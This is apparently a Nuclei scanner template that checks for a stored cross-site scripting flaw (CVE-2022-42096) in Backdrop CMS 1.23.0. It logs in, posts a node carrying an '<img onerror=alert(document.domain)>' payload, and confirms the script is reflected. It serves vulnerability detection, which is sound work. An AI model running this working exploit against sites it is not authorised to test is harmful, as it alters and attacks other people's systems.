id: CVE-2022-42096

info:
  name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)
  author: theamanrawat
  severity: medium
  description: |
    Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content.
  remediation: |
    Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor.
  reference:
    - https://github.com/backdrop/backdrop/releases/tag/1.23.0
    - https://github.com/bypazs/CVE-2022-42096
    - https://nvd.nist.gov/vuln/detail/CVE-2022-42096
    - https://backdropcms.org
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2022-42096
    cwe-id: CWE-79
    epss-score: 0.0043
    epss-percentile: 0.71563
    cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: backdropcms
    product: backdrop_cms
  tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive

http:
  - raw:
      - |
        GET /?q=user/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /?q=user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in
      - |
        GET /?q=node/add/post HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /?q=node/add/post HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp

        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="title"

        {{randstr}}
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="field_tags[und]"

        {{randstr}}
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="body[und][0][summary]"


        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="body[und][0][value]"

        <img src=x onerror=alert(document.domain)>

        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="body[und][0][format]"

        full_html
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="files[field_image_und_0]"; filename=""
        Content-Type: application/octet-stream


        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="field_image[und][0][fid]"

        0
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="field_image[und][0][display]"

        1
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="changed"


        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="form_build_id"

        {{form_id_1}}
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="form_token"

        {{form_token}}
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="form_id"

        {{form_id_2}}
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="status"

        1
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="scheduled[date]"

        2023-04-25
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="scheduled[time]"

        16:59:23
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="promote"

        1
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="name"

        {{name}}
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="date[date]"

        2023-04-24
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="date[time]"

        16:59:23
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="path[auto]"

        1
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="comment"

        2
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="additional_settings__active_tab"


        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="op"

        Save
        ------WebKitFormBoundaryIubltUxssi0yqDjp--
      - |
        GET /?q=posts/{{randstr}} HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - <img src="x" onerror="alert(document.domain)" />
          - Backdrop CMS
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: form_id_1
        group: 1
        regex:
          - name="form_build_id" value="(.*)"
        internal: true

      - type: regex
        name: name
        group: 1
        regex:
          - name="name" value="(.*?)"
        internal: true

      - type: regex
        name: form_id_2
        group: 1
        regex:
          - name="form_id" value="(.*)"
        internal: true

      - type: regex
        name: form_token
        group: 1
        regex:
          - name="form_token" value="(.*)"
        internal: true

# digest: 4a0a00473045022100e98b98ec06cc3693b92b0f02499e0911f4363fcfb87dbf4b5eff8b95b88f5e680220436d86308ad448b3164637158cfee26e9148f235ac84ab44ab005e841bf6b1db:922c64590222798bb761d5b6d8e72950